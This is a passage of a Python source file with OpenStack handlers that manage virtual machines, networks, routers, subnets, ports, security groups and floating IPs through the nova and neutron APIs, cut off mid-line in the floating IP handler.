So \"mon\" matches mon and mongo\n # Filter again to ensure a correct result\n servers = [x for x in servers if x.name == resource.name]\n if len(servers) == 0:\n return None\n\n elif len(servers) == 1:\n return servers[0]\n\n else:\n raise Exception(\"Multiple virtual machines with name %s exist.\" % resource.name)\n\n @cache(timeout=10)\n def _port_id(self, port_name):\n ports = self._neutron.list_ports(name=port_name)\n if len(ports[\"ports\"]) > 0:\n return ports[\"ports\"][0][\"id\"]\n\n return None\n\n @cache(timeout=10)\n def _get_subnet_id(self, subnet_name):\n subnets = self._neutron.list_subnets(name=subnet_name)\n if len(subnets[\"subnets\"]) > 0:\n return subnets[\"subnets\"][0][\"network_id\"]\n\n return None\n\n def _create_nic_config(self, port):\n nic = {}\n port_id = self._port_id(port[\"name\"])\n if port_id is None:\n network = self._get_subnet_id(port[\"network\"])\n if network is None:\n raise SkipResource(\"Network %s not found\" % port[\"network\"])\n nic[\"net-id\"] = network\n if not port[\"dhcp\"] and port[\"address\"] is not None:\n nic[\"v4-fixed-ip\"] = port[\"address\"]\n else:\n nic[\"port-id\"] = port_id\n\n return nic\n\n def _build_nic_list(self, ports):\n # build a list of nics for this server based on the index in the ports\n no_sort = sorted([p for p in ports if p[\"index\"] == 0], key=lambda x: x[\"network\"])\n sort = sorted([p for p in ports if p[\"index\"] > 0], key=lambda x: x[\"index\"])\n\n return [self._create_nic_config(p) for p in sort] + [self._create_nic_config(p) for p in no_sort]\n\n def _build_sg_list(self, ctx, security_groups):\n sg_list = []\n for group in security_groups:\n sg = self.get_security_group(ctx, name=group)\n if sg is not None:\n sg_list.append(sg[\"name\"])\n return sg_list\n\n def _ensure_key(self, ctx, resource):\n keys = {k.name: k for k in self._nova.keypairs.list()}\n if resource.key_name not in keys:\n self._nova.keypairs.create(resource.key_name, resource.key_value)\n ctx.info(\"Created a new keypair with name %(name)s\", name=resource.key_name)\n\n def read_resource(self, ctx, resource):\n \"\"\"\n This method will check what the status of the give resource is on\n openstack.\n \"\"\"\n server = self.get_vm(ctx, resource)\n if server is None:\n raise ResourcePurged()\n\n else:\n resource.purged = False\n resource.security_groups = [sg.name for sg in server.list_security_group()]\n # The port handler has to handle all network/port related changes\n\n ctx.set(\"server\", server)\n\n def create_resource(self, ctx, resource: resources.PurgeableResource) -> None:\n if resource.admin_tenant != resource.project:\n ctx.error(\"The nova API does not allow to create virtual machines in an other project than the one logged into.\"\n \" Current login %(admin_project)s, requested project %(project)s\",\n admin_project=resource.admin_tenant, project=resource.project)\n raise Exception()\n\n self._ensure_key(ctx, resource)\n flavor = self._nova.flavors.find(name=resource.flavor)\n nics = self._build_nic_list(resource.ports)\n self._nova.servers.create(resource.name, flavor=flavor.id, userdata=resource.user_data, nics=nics,\n security_groups=self._build_sg_list(ctx, resource.security_groups),\n image=resource.image, key_name=resource.key_name, config_drive=resource.config_drive)\n ctx.set_created()\n\n def delete_resource(self, ctx, resource: resources.PurgeableResource) -> None:\n server = ctx.get(\"server\")\n server.delete()\n\n # Wait until the server has been deleted\n count = 0\n ctx.info(\"Server deleted, waiting for 
neutron to report all ports deleted.\")\n while server is not None and count < 60:\n ports = self._neutron.list_ports(device_id=server.id)\n if len(ports[\"ports\"]) > 0:\n time.sleep(1)\n count += 1\n else:\n server = None\n\n if server is not None:\n ctx.warning(\"Delete still in progress, giving up waiting.\")\n\n ctx.set_purged()\n\n def update_resource(self, ctx, changes: dict, resource: resources.PurgeableResource) -> None:\n server = ctx.get(\"server\")\n\n self._ensure_key(ctx, resource)\n if \"security_groups\" in changes:\n current = set(changes[\"security_groups\"][\"current\"])\n desired = set(changes[\"security_groups\"][\"desired\"])\n\n for new_rule in (desired - current):\n self._nova.servers.add_security_group(server, new_rule)\n\n for remove_rule in (current - desired):\n self._nova.servers.remove_security_group(server, remove_rule)\n\n ctx.set_updated()\n\n def facts(self, ctx, resource):\n ctx.debug(\"Finding facts for %s\" % resource.id.resource_str())\n\n try:\n vm = self.get_vm(ctx, resource)\n\n networks = vm.networks\n\n facts = {}\n for name, ips in networks.items():\n for i in range(len(ips)):\n facts[\"subnet_%s_ip_%d\" % (name, i)] = ips[i]\n if i == 0:\n facts[\"subnet_%s_ip\" % name] = ips[i]\n\n # Get the private ip of the first port\n project_id = self.get_project_id(resource, resource.project)\n network_one = None\n for port in resource.ports:\n if port[\"index\"] == 1:\n network_one = port[\"network\"]\n\n if project_id is not None and network_one is not None:\n ports = self._neutron.list_ports(device_id=vm.id)\n for port in ports[\"ports\"]:\n for ips in port[\"fixed_ips\"]:\n subnet = self.get_subnet(project_id, subnet_id=ips[\"subnet_id\"])\n if subnet[\"name\"] == network_one:\n facts[\"ip_address\"] = ips[\"ip_address\"]\n\n return facts\n except Exception:\n return {}\n\n\n@provider(\"openstack::Network\", name=\"openstack\")\nclass NetworkHandler(OpenStackHandler):\n def read_resource(self, ctx: handler.HandlerContext, resource: resources.PurgeableResource):\n network = self.facts(ctx, resource)\n\n if len(network) > 0:\n resource.purged = False\n resource.external = network[\"router:external\"]\n if resource.physical_network != \"\":\n resource.physical_network = network[\"provider:physical_network\"]\n\n if resource.network_type != \"\":\n resource.network_type = network[\"provider:network_type\"]\n\n if resource.segmentation_id > 0:\n resource.segmentation_id = network[\"provider:segmentation_id\"]\n\n ctx.set(\"network_id\", network[\"id\"])\n ctx.set(\"project_id\", network[\"tenant_id\"])\n\n else:\n raise ResourcePurged()\n\n def _create_dict(self, resource: Network, project_id):\n net = {\"name\": resource.name, \"tenant_id\": project_id, \"admin_state_up\": True, \"router:external\": resource.external}\n\n if resource.physical_network != \"\":\n net[\"provider:physical_network\"] = resource.physical_network\n\n if resource.network_type != \"\":\n net[\"provider:network_type\"] = resource.network_type\n\n if resource.segmentation_id > 0:\n net[\"provider:segmentation_id\"] = resource.segmentation_id\n\n return net\n\n def create_resource(self, ctx: handler.HandlerContext, resource: resources.PurgeableResource):\n project_id = self.get_project_id(resource, resource.project)\n self._neutron.create_network({\"network\": self._create_dict(resource, project_id)})\n ctx.set_created()\n\n def delete_resource(self, ctx: handler.HandlerContext, resource: resources.PurgeableResource):\n network_id = ctx.get(\"network_id\")\n 
self._neutron.delete_network(network_id)\n        ctx.set_purged()\n\n    def update_resource(self, ctx: handler.HandlerContext, changes: dict, resource: resources.PurgeableResource):\n        network_id = ctx.get(\"network_id\")\n        self._neutron.update_network(network_id, {\"network\": {\"name\": resource.name, \"router:external\": resource.external}})\n\n        ctx.fields_updated((\"name\", \"external\"))\n        ctx.set_updated()\n\n    def facts(self, ctx, resource: Network):\n        try:\n            networks = self._neutron.list_networks(name=resource.name)[\"networks\"]\n        except NotFound:\n            return {}\n\n        if len(networks) == 0:\n            return {}\n\n        if len(networks) > 1:\n            LOGGER.warning(\"Multiple networks with the same name available!\")\n            return {}\n\n        return networks[0]\n\n\n@provider(\"openstack::Router\", name=\"openstack\")\nclass RouterHandler(OpenStackHandler):\n    def read_resource(self, ctx: handler.HandlerContext, resource: resources.PurgeableResource) -> None:\n        neutron_version = self.facts(ctx, resource)\n\n        if len(neutron_version) > 0:\n            ctx.set(\"neutron\", neutron_version)\n            resource.purged = False\n\n        else:\n            raise ResourcePurged()\n\n        # get a list of all attached subnets\n        ext_name = \"\"\n        external_net_id = \"\"\n        if \"external_gateway_info\" in neutron_version and neutron_version[\"external_gateway_info\"] is not None:\n            external_net_id = neutron_version[\"external_gateway_info\"][\"network_id\"]\n\n            networks = self._neutron.list_networks(id=external_net_id)\n            if len(networks[\"networks\"]) == 1:\n                ext_name = networks[\"networks\"][0][\"name\"]\n\n        resource.gateway = ext_name\n\n        ports = self._neutron.list_ports(device_id=neutron_version[\"id\"])\n        subnet_list = []\n        for port in ports[\"ports\"]:\n            subnets = port[\"fixed_ips\"]\n            if port[\"name\"] == \"\" or port[\"name\"] not in resource.ports:\n                for subnet in subnets:\n                    try:\n                        subnet_details = self._neutron.show_subnet(subnet[\"subnet_id\"])[\"subnet\"]\n                        # skip external networks and neutron networks such as ha networks\n                        if subnet_details[\"network_id\"] != external_net_id and subnet_details[\"tenant_id\"] != \"\":\n                            subnet_list.append(subnet_details[\"name\"])\n\n                    except exceptions.NeutronClientException:\n                        pass\n\n        resource.subnets = sorted(subnet_list)\n\n        routes = {}\n        for route in neutron_version[\"routes\"]:\n            routes[route[\"destination\"]] = route[\"nexthop\"]\n\n        resource.routes = routes\n\n    def create_resource(self, ctx: handler.HandlerContext, resource: resources.PurgeableResource) -> None:\n        project_id = self.get_project_id(resource, resource.project)\n        if project_id is None:\n            raise SkipResource(\"Cannot create router when project id is not yet known.\")\n\n        result = self._neutron.create_router({\"router\": {\"name\": resource.name, \"tenant_id\": project_id}})\n        router_id = result[\"router\"][\"id\"]\n        ctx.info(\"Created router with id %(id)s\", id=router_id)\n        ctx.set_created()\n\n        if len(resource.subnets) > 0:\n            self._update_subnets(router_id, [], resource.subnets)\n            ctx.info(\"Added subnets to router with id %(id)s\", id=router_id)\n\n        if resource.gateway is not None and resource.gateway != \"\":\n            self._set_gateway(router_id, resource.gateway)\n            ctx.info(\"Set gateway of router with id %(id)s\", id=router_id)\n\n    def delete_resource(self, ctx: handler.HandlerContext, resource: resources.PurgeableResource) -> None:\n        router_id = ctx.get(\"neutron\")[\"id\"]\n\n        ports = self._neutron.list_ports(device_id=router_id)[\"ports\"]\n        for port in ports:\n            if port[\"device_owner\"] == \"network:router_interface\":\n                ctx.info(\"Detach interface with port id 
%(port)s from router %(router_id)s\",\n                         port=port[\"id\"], router_id=router_id)\n                self._neutron.remove_interface_router(router=router_id, body={\"port_id\": port[\"id\"]})\n\n        self._neutron.delete_router(router_id)\n        ctx.set_purged()\n\n    def _update_subnets(self, router_id, current, desired):\n        current = set(current)\n        to = set(desired)\n\n        # subnets to add to the router\n        for subnet in (to - current):\n            # query for the subnet id\n            subnet_data = self._neutron.list_subnets(name=subnet)\n            if \"subnets\" not in subnet_data or len(subnet_data[\"subnets\"]) != 1:\n                raise Exception(\"Unable to find id of subnet %s\" % subnet)\n\n            subnet_id = subnet_data[\"subnets\"][0][\"id\"]\n            self._neutron.add_interface_router(router=router_id, body={\"subnet_id\": subnet_id})\n\n        # subnets to delete\n        for subnet in (current - to):\n            # query for the subnet id\n            subnet_data = self._neutron.list_subnets(name=subnet)\n            if \"subnets\" not in subnet_data or len(subnet_data[\"subnets\"]) != 1:\n                raise Exception(\"Unable to find id of subnet %s\" % subnet)\n\n            subnet_id = subnet_data[\"subnets\"][0][\"id\"]\n            self._neutron.remove_interface_router(router=router_id, body={\"subnet_id\": subnet_id})\n\n    def _set_gateway(self, router_id, network):\n        network = self.get_network(None, name=network)\n        if network is None:\n            raise Exception(\"Unable to set router gateway because the gateway network does not exist.\")\n\n        self._neutron.add_gateway_router(router_id, {'network_id': network[\"id\"]})\n\n    def update_resource(self, ctx: handler.HandlerContext, changes: dict, resource: resources.PurgeableResource) -> None:\n        router_id = ctx.get(\"neutron\")[\"id\"]\n        if \"name\" in changes:\n            self._neutron.update_router(router_id, {\"router\": {\"name\": resource.name}})\n            ctx.set_updated()\n\n        if \"subnets\" in changes:\n            self._update_subnets(router_id, changes[\"subnets\"][\"current\"], changes[\"subnets\"][\"desired\"])\n            ctx.info(\"Modified subnets of router with id %(id)s\", id=router_id)\n            ctx.set_updated()\n\n        if \"gateway\" in changes:\n            self._set_gateway(router_id, resource.gateway)\n            ctx.info(\"Modified gateway of router with id %(id)s\", id=router_id)\n            ctx.set_updated()\n\n        if \"routes\" in changes:\n            ctx.set_updated()\n            self._neutron.update_router(router_id, {\"router\": {\"routes\": [{\"nexthop\": n, \"destination\": d}\n                                                                          for d, n in resource.routes.items()]}})\n\n    def facts(self, ctx, resource: Router) -> dict:\n        routers = self._neutron.list_routers(name=resource.name)\n\n        if \"routers\" not in routers:\n            return {}\n\n        filtered_list = [rt for rt in routers[\"routers\"] if rt[\"name\"] == resource.name]\n\n        if len(filtered_list) == 0:\n            return {}\n\n        if len(filtered_list) > 1:\n            LOGGER.warning(\"Multiple routers with the same name available!\")\n            return {}\n\n        router = filtered_list[0]\n        return router\n\n\n@provider(\"openstack::Subnet\", name=\"openstack\")\nclass SubnetHandler(OpenStackHandler):\n    def read_resource(self, ctx: handler.HandlerContext, resource: resources.PurgeableResource) -> None:\n        neutron_version = self.facts(ctx, resource)\n\n        if len(neutron_version) > 0:\n            resource.purged = False\n            resource.id = neutron_version[\"id\"]\n            resource.network_address = neutron_version[\"cidr\"]\n            resource.dhcp = neutron_version[\"enable_dhcp\"]\n            resource.network_id = neutron_version[\"network_id\"]\n            resource.dns_servers = neutron_version[\"dns_nameservers\"]\n\n            pool = neutron_version[\"allocation_pools\"][0]\n            if resource.allocation_start != \"\" and resource.allocation_end != \"\":  # only change when they are 
both set\n                resource.allocation_start = pool[\"start\"]\n                resource.allocation_end = pool[\"end\"]\n\n            ctx.set(\"neutron\", neutron_version)\n        else:\n            raise ResourcePurged()\n\n    def create_resource(self, ctx: handler.HandlerContext, resource: resources.PurgeableResource) -> None:\n        project_id = self.get_project_id(resource, resource.project)\n        if project_id is None:\n            raise SkipResource(\"Cannot create subnet when project id is not yet known.\")\n\n        network = self.get_network(project_id, name=resource.network)\n        if network is None:\n            raise Exception(\"Unable to create subnet because the network does not exist.\")\n\n        body = {\"name\": resource.name, \"network_id\": network[\"id\"], \"enable_dhcp\": resource.dhcp,\n                \"cidr\": resource.network_address, \"ip_version\": 4, \"tenant_id\": project_id}\n\n        if len(resource.allocation_start) > 0 and len(resource.allocation_end) > 0:\n            body[\"allocation_pools\"] = [{\"start\": resource.allocation_start, \"end\": resource.allocation_end}]\n\n        if len(resource.dns_servers) > 0:\n            body[\"dns_nameservers\"] = resource.dns_servers\n\n        self._neutron.create_subnet({\"subnet\": body})\n        ctx.set_created()\n\n    def delete_resource(self, ctx: handler.HandlerContext, resource: resources.PurgeableResource) -> None:\n        neutron = ctx.get(\"neutron\")\n        self._neutron.delete_subnet(neutron[\"id\"])\n        ctx.set_purged()\n\n    def update_resource(self, ctx: handler.HandlerContext, changes: dict, resource: resources.PurgeableResource) -> None:\n        neutron = ctx.get(\"neutron\")\n\n        # Send everything that can be updated to the server, the API will figure out what to change\n        body = {\"subnet\": {\"enable_dhcp\": resource.dhcp}}\n        if len(resource.allocation_start) > 0 and len(resource.allocation_end) > 0:\n            body[\"subnet\"][\"allocation_pools\"] = [{\"start\": resource.allocation_start,\n                                                   \"end\": resource.allocation_end}]\n\n        if len(resource.dns_servers) > 0:\n            body[\"subnet\"][\"dns_nameservers\"] = resource.dns_servers\n\n        self._neutron.update_subnet(neutron[\"id\"], body)\n        ctx.set_updated()\n\n    @cache(timeout=5)\n    def facts(self, ctx, resource):\n        subnets = self._neutron.list_subnets(name=resource.name)\n\n        if \"subnets\" not in subnets:\n            return {}\n\n        filtered_list = [sn for sn in subnets[\"subnets\"] if sn[\"name\"] == resource.name]\n\n        if len(filtered_list) == 0:\n            return {}\n\n        if len(filtered_list) > 1:\n            LOGGER.warning(\"Multiple subnets with the same name available!\")\n            return {}\n\n        subnet = filtered_list[0]\n        return subnet\n\n\n@provider(\"openstack::RouterPort\", name=\"openstack\")\nclass RouterPortHandler(OpenStackHandler):\n    def read_resource(self, ctx: handler.HandlerContext, resource: resources.PurgeableResource) -> None:\n        project_id = self.get_project_id(resource, resource.project)\n        if project_id is None:\n            raise SkipResource(\"Cannot read router port when project id is not yet known.\")\n\n        neutron_version = self.facts(ctx, resource)\n        ctx.set(\"neutron\", neutron_version)\n        ctx.set(\"project_id\", project_id)\n\n        router = None\n        if len(neutron_version) > 0:\n            # Router stuff\n            if neutron_version[\"device_id\"] == \"\":\n                resource.router = \"\"\n            else:\n                router = self.get_router(router_id=neutron_version[\"device_id\"])\n                resource.router = router[\"name\"]\n\n            # Network stuff\n            network = self.get_network(project_id, network_id=neutron_version[\"network_id\"])\n            resource.network = network[\"name\"]\n            ctx.set(\"network\", network)\n\n            # IP address / subnet stuff\n            subnet = None\n            if len(neutron_version[\"fixed_ips\"]) > 1:\n                raise Exception(\"This handler only supports ports 
that have an address in a single subnet.\")\n            elif len(neutron_version[\"fixed_ips\"]) == 0:\n                resource.subnet = \"\"\n                resource.address = \"\"\n            else:\n                subnet = self.get_subnet(project_id, subnet_id=neutron_version[\"fixed_ips\"][0][\"subnet_id\"])\n                resource.subnet = subnet[\"name\"]\n                resource.address = neutron_version[\"fixed_ips\"][0][\"ip_address\"]\n\n            ctx.set(\"subnet\", subnet)\n\n            resource.purged = False\n        else:\n            raise ResourcePurged()\n\n    def create_resource(self, ctx: handler.HandlerContext, resource: resources.PurgeableResource) -> None:\n        project_id = ctx.get(\"project_id\")\n\n        network = self.get_network(project_id, name=resource.network)\n        if network is None:\n            raise SkipResource(\"Unable to create router port because the network does not exist.\")\n\n        subnet = self.get_subnet(project_id, name=resource.subnet)\n        if subnet is None:\n            raise SkipResource(\"Unable to create router port because the subnet does not exist.\")\n\n        router = self.get_router(project_id, name=resource.router)\n        if router is None:\n            raise SkipResource(\"Unable to create router port because the router does not exist.\")\n\n        body_value = {'port': {'admin_state_up': True, 'name': resource.name, 'network_id': network[\"id\"]}}\n        if resource.address != \"\":\n            body_value[\"port\"][\"fixed_ips\"] = [{\"subnet_id\": subnet[\"id\"], \"ip_address\": resource.address}]\n\n        result = self._neutron.create_port(body=body_value)\n\n        if \"port\" not in result:\n            raise Exception(\"Unable to create port.\")\n\n        port_id = result[\"port\"][\"id\"]\n\n        # attach it to the router\n        self._neutron.add_interface_router(router[\"id\"], body={\"port_id\": port_id})\n        ctx.set_created()\n\n    def delete_resource(self, ctx: handler.HandlerContext, resource: resources.PurgeableResource) -> None:\n        port = ctx.get(\"neutron\")\n\n        if port[\"device_owner\"] == \"network:router_interface\":\n            ctx.info(\"Detach interface with port id %(port)s from router %(router_id)s\",\n                     port=port[\"id\"], router_id=port[\"device_id\"])\n            self._neutron.remove_interface_router(router=port[\"device_id\"], body={\"port_id\": port[\"id\"]})\n        else:\n            self._neutron.delete_port(port[\"id\"])\n\n        ctx.set_purged()\n\n    def update_resource(self, ctx: handler.HandlerContext, changes: dict, resource: resources.PurgeableResource) -> None:\n        raise SkipResource(\"Making changes to router ports is not supported.\")\n\n    def facts(self, ctx, resource: RouterPort):\n        ports = self._neutron.list_ports(name=resource.name)\n\n        if \"ports\" not in ports:\n            return {}\n\n        filtered_list = [port for port in ports[\"ports\"] if port[\"name\"] == resource.name]\n\n        if len(filtered_list) == 0:\n            return {}\n\n        if len(filtered_list) > 1:\n            LOGGER.warning(\"Multiple ports with the same name available!\")\n            return {}\n\n        port = filtered_list[0]\n        return port\n\n\n@provider(\"openstack::HostPort\", name=\"openstack\")\nclass HostPortHandler(OpenStackHandler):\n    def get_port(self, ctx, network_id, device_id):\n        ports = self._neutron.list_ports(network_id=network_id, device_id=device_id)[\"ports\"]\n        ctx.debug(\"Retrieved ports matching network %(network_id)s and device %(device_id)s\",\n                  network_id=network_id, device_id=device_id, ports=ports)\n        if len(ports) > 0:\n            return ports[0]\n        return None\n\n    def wait_for_active(self, ctx, project_id, resource):\n        \"\"\"\n        A port cannot be attached to a VM when the VM is in the building state. This method waits a limited amount of\n        time for the VM to become active. 
If it takes too long, this resource will be skipped.\n        \"\"\"\n        tries = 0\n        max_attempts = resource.retries if resource.retries > 0 else 1\n        vm_state = None\n        while tries < max_attempts:\n            vm = self.get_host(project_id, resource.host)\n            if vm is None:\n                raise SkipResource(\"Unable to create host port because the vm does not exist.\")\n            vm_state = getattr(vm, \"OS-EXT-STS:vm_state\")\n            if vm_state == \"active\":\n                return vm\n\n            ctx.info(\"VM for port is not in active state. Waiting %(wait)s seconds before retrying.\", wait=resource.wait)\n            tries += 1\n            time.sleep(resource.wait)\n\n        raise SkipResource(\"Unable to create host port because vm is not in active state (current %s)\" % vm_state)\n\n    def read_resource(self, ctx: handler.HandlerContext, resource: resources.PurgeableResource) -> None:\n        if resource.purged:\n            # Most stuff below here will err eventually\n            return\n\n        project_id = self.get_project_id(resource, resource.project)\n        if project_id is None:\n            raise SkipResource(\"Cannot create a host port when project id is not yet known.\")\n        ctx.set(\"project_id\", project_id)\n\n        network = self.get_network(project_id, resource.network)\n        if network is None:\n            raise SkipResource(\"Network %s for port %s not found.\" % (resource.network, resource.name))\n        ctx.set(\"network\", network)\n\n        vm = self.wait_for_active(ctx, project_id, resource)\n        if vm is None:\n            raise SkipResource(\"Unable to create host port because the vm does not exist.\")\n\n        ctx.set(\"vm\", vm)\n\n        port = self.get_port(ctx, network[\"id\"], vm.id)\n        ctx.set(\"port\", port)\n        if port is None:\n            raise ResourcePurged()\n\n        resource.purged = False\n        if not resource.dhcp:\n            resource.address = port[\"fixed_ips\"][0][\"ip_address\"]\n\n        if len(port[\"fixed_ips\"]) > 0:\n            subnet = self.get_subnet(project_id, subnet_id=port[\"fixed_ips\"][0][\"subnet_id\"])\n            resource.subnet = subnet[\"name\"]\n        else:\n            resource.subnet = \"\"\n\n        if \"port_security_enabled\" in port:\n            resource.portsecurity = port[\"port_security_enabled\"]\n            ctx.set(\"portsecurity\", True)\n        else:\n            ctx.set(\"portsecurity\", False)\n            resource.portsecurity = True\n        if not resource.portsecurity:\n            # Port security is not enabled in the API, but resource wants to disable it.\n            ctx.warning(\"Ignoring portsecurity=False because the port security extension is not enabled.\")\n\n        resource.name = port[\"name\"]\n\n    def create_resource(self, ctx: handler.HandlerContext, resource: resources.PurgeableResource) -> None:\n        project_id = ctx.get(\"project_id\")\n        network = ctx.get(\"network\")\n        vm = ctx.get(\"vm\")\n        subnet = self.get_subnet(project_id, name=resource.subnet)\n        if subnet is None:\n            raise SkipResource(\"Unable to create host port because the subnet does not exist.\")\n\n        try:\n            body_value = {'port': {'admin_state_up': True, 'name': resource.name, 'network_id': network[\"id\"]}}\n\n            if resource.address != \"\" and not resource.dhcp:\n                body_value[\"port\"][\"fixed_ips\"] = [{\"subnet_id\": subnet[\"id\"], \"ip_address\": resource.address}]\n\n            if (not ctx.contains(\"portsecurity\") or ctx.get(\"portsecurity\")) and not resource.portsecurity:\n                body_value[\"port\"][\"port_security_enabled\"] = False\n                body_value[\"port\"][\"security_groups\"] = None\n\n            result = self._neutron.create_port(body=body_value)\n\n            if \"port\" not in result:\n                raise Exception(\"Unable to create port.\")\n\n            port_id = result[\"port\"][\"id\"]\n\n            # attach it to the host\n            vm.interface_attach(port_id, None, None)\n        except novaclient.exceptions.Conflict as e:\n            raise SkipResource(\"Host is not ready: %s\" % str(e), e)\n\n        ctx.set_created()\n\n    def delete_resource(self, ctx: handler.HandlerContext, resource: resources.PurgeableResource) -> None:\n        port 
= ctx.get(\"port\")\n response = self._neutron.delete_port(port[\"id\"])\n ctx.info(\"Deleted port %(port_id)s with response %(response)s\", port_id=port[\"id\"], response=response)\n ctx.set_purged()\n\n def update_resource(self, ctx: handler.HandlerContext, changes: dict, resource: resources.PurgeableResource) -> None:\n port = ctx.get(\"port\")\n\n try:\n if ctx.get(\"portsecurity\") and \"portsecurity\" in changes:\n if not changes[\"portsecurity\"][\"desired\"]:\n self._neutron.update_port(port=port[\"id\"], body={\"port\": {\"port_security_enabled\": False,\n \"security_groups\": None}})\n else:\n raise SkipResource(\"Turning port security on again is not supported.\")\n\n del changes[\"portsecurity\"]\n\n if \"name\" in changes:\n self._neutron.update_port(port=port[\"id\"], body={\"port\": {\"name\": resource.name}})\n del changes[\"name\"]\n\n if len(changes) > 0:\n raise SkipResource(\"not implemented, %s\" % changes)\n\n except novaclient.exceptions.Conflict as e:\n raise SkipResource(\"Host is not ready: %s\" % str(e))\n\n @cache(timeout=5)\n def facts(self, ctx, resource):\n ports = self._neutron.list_ports(name=resource.name)\n\n if \"ports\" not in ports:\n return {}\n\n filtered_list = [port for port in ports[\"ports\"] if port[\"name\"] == resource.name]\n\n if len(filtered_list) == 0:\n return {}\n\n if len(filtered_list) > 1:\n LOGGER.warning(\"Multiple ports with the same name available!\")\n return {}\n\n port = filtered_list[0]\n facts = {}\n index = 0\n for ip in port[\"fixed_ips\"]:\n facts[\"ip_address_%d\" % index] = ip[\"ip_address\"]\n if index == 0:\n facts[\"ip_address\"] = ip[\"ip_address\"]\n\n return facts\n\n\n@provider(\"openstack::SecurityGroup\", name=\"openstack\")\nclass SecurityGroupHandler(OpenStackHandler):\n def _build_current_rules(self, ctx, security_group):\n rules = []\n for rule in security_group[\"security_group_rules\"]:\n if rule[\"ethertype\"] != \"IPv4\":\n continue\n\n current_rule = {\"__id\": rule[\"id\"]}\n if rule[\"protocol\"] is None:\n current_rule[\"protocol\"] = \"all\"\n else:\n current_rule[\"protocol\"] = rule[\"protocol\"]\n\n if rule[\"remote_ip_prefix\"] is not None:\n current_rule[\"remote_ip_prefix\"] = rule[\"remote_ip_prefix\"]\n\n elif rule[\"remote_group_id\"] is not None:\n rgi = self.get_security_group(ctx, group_id=rule[\"remote_group_id\"])\n current_rule[\"remote_group\"] = rgi[\"name\"]\n\n else:\n current_rule[\"remote_ip_prefix\"] = \"0.0.0.0/0\"\n\n current_rule[\"direction\"] = rule[\"direction\"]\n current_rule[\"port_range_min\"] = rule[\"port_range_min\"]\n current_rule[\"port_range_max\"] = rule[\"port_range_max\"]\n\n rules.append(current_rule)\n\n return rules\n\n def read_resource(self, ctx: handler.HandlerContext, resource: SecurityGroup) -> None:\n sg = self.get_security_group(ctx, name=resource.name)\n\n ctx.set(\"sg\", sg)\n if sg is None:\n raise ResourcePurged()\n\n resource.purged = False\n resource.description = sg[\"description\"]\n resource.rules = self._build_current_rules(ctx, sg)\n\n def _compare_rule(self, old, new):\n old_keys = set([x for x in old.keys() if not x.startswith(\"__\")])\n new_keys = set([x for x in new.keys() if not x.startswith(\"__\")])\n\n if old_keys != new_keys:\n return False\n\n for key in old_keys:\n if old[key] != new[key]:\n return False\n\n return True\n\n def _diff(self, current, desired):\n changes = OpenStackHandler._diff(self, current, desired)\n\n if \"rules\" in changes:\n old_rules = list(changes[\"rules\"][\"current\"])\n new_rules = 
list(changes[\"rules\"][\"desired\"])\n\n for new_rule in changes[\"rules\"][\"desired\"]:\n for old_rule in changes[\"rules\"][\"current\"]:\n if self._compare_rule(old_rule, new_rule):\n old_rules.remove(old_rule)\n new_rules.remove(new_rule)\n break\n\n if len(old_rules) == 0 and len(new_rules) == 0:\n del changes[\"rules\"]\n\n return changes\n\n def _update_rules(self, group_id, resource, current_rules, desired_rules):\n # # Update rules. First add all new rules, than remove unused rules\n old_rules = list(current_rules)\n # new_rules = [dict(x) for x in desired_rules]\n new_rules = list(desired_rules)\n\n for new_rule in desired_rules:\n for old_rule in current_rules:\n if self._compare_rule(old_rule, new_rule):\n old_rules.remove(old_rule)\n new_rules.remove(new_rule)\n break\n\n for new_rule in new_rules:\n new_rule[\"ethertype\"] = \"IPv4\"\n if \"remote_group\" in new_rule:\n if new_rule[\"remote_group\"] is not None:\n # lookup the id of the group\n groups = self._neutron.list_security_groups(name=new_rule[\"remote_group\"])[\"security_groups\"]\n if len(groups) == 0:\n # TODO: log skip rule\n continue # Do not update this rule\n\n del new_rule[\"remote_group\"]\n new_rule[\"remote_group_id\"] = groups[0][\"id\"]\n\n else:\n del new_rule[\"remote_group_id\"]\n\n new_rule[\"security_group_id\"] = group_id\n\n if new_rule[\"protocol\"] == \"all\":\n new_rule[\"protocol\"] = None\n\n try:\n self._neutron.create_security_group_rule({'security_group_rule': new_rule})\n except exceptions.Conflict:\n LOGGER.exception(\"Rule conflict for rule %s\", new_rule)\n raise\n\n for old_rule in old_rules:\n try:\n self._neutron.delete_security_group_rule(old_rule[\"__id\"])\n except exceptions.NotFound:\n # TODO: handle this\n pass\n\n def create_resource(self, ctx: handler.HandlerContext, resource: SecurityGroup) -> None:\n sg = self._neutron.create_security_group({\"security_group\": {\"name\": resource.name,\n \"description\": resource.description}})\n current_rules = self._build_current_rules(ctx, sg[\"security_group\"])\n self._update_rules(sg[\"security_group\"][\"id\"], resource, current_rules, resource.rules)\n ctx.set_created()\n\n def delete_resource(self, ctx: handler.HandlerContext, resource: SecurityGroup) -> None:\n sg = ctx.get(\"sg\")\n tries = 0\n max_attempts = resource.retries if resource.retries > 0 else 1\n while tries < max_attempts:\n try:\n self._neutron.delete_security_group(sg[\"id\"])\n ctx.set_purged()\n return\n except Exception:\n ctx.info(\"Delete failed. 
Waiting %(wait)s seconds before retrying.\", wait=resource.wait)\n                time.sleep(resource.wait)\n                tries += 1\n\n        raise SkipResource(\"Deleting the security group failed, probably because it is still in use.\")\n\n    def update_resource(self, ctx: handler.HandlerContext, changes: dict, resource: SecurityGroup) -> None:\n        sg = ctx.get(\"sg\")\n        if \"name\" in changes or \"description\" in changes:\n            self._neutron.update_security_group(sg[\"id\"], {\"security_group\": {\"name\": resource.name,\n                                                                              \"description\": resource.description}})\n            ctx.set_updated()\n\n        if \"rules\" in changes:\n            self._update_rules(sg[\"id\"], resource, changes[\"rules\"][\"current\"], changes[\"rules\"][\"desired\"])\n            ctx.set_updated()\n\n    @cache(timeout=5)\n    def facts(self, ctx, resource):\n        return {}\n\n\n@provider(\"openstack::FloatingIP\", name=\"openstack\")\nclass FloatingIPHandler(OpenStackHandler):\n    @cache(timeout=10)\n    def get_port_id(self, name):\n        ports = self._neutron.list_ports(name=name)[\"ports\"]\n        if len(ports) == 0:\n            return None\n\n        elif len(ports) == 1:\n            return ports[0][\"id\"]\n        else:\n            raise Exception(\"Multiple ports found with name %s\" % name)\n\n    @cache(timeout=10)\n    def get_floating_ip(self, port_id):\n        fip = self._neutron.list_floatingips(port_id=port_id)[\"floatingips\"]\n        if len(fip) == 0:\n            return None\n\n        else:\n            return fip[0][\"id\"]\n\n    def read_resource(self, ctx: handler.HandlerContext, resource: FloatingIP) -> None:\n        port_id = 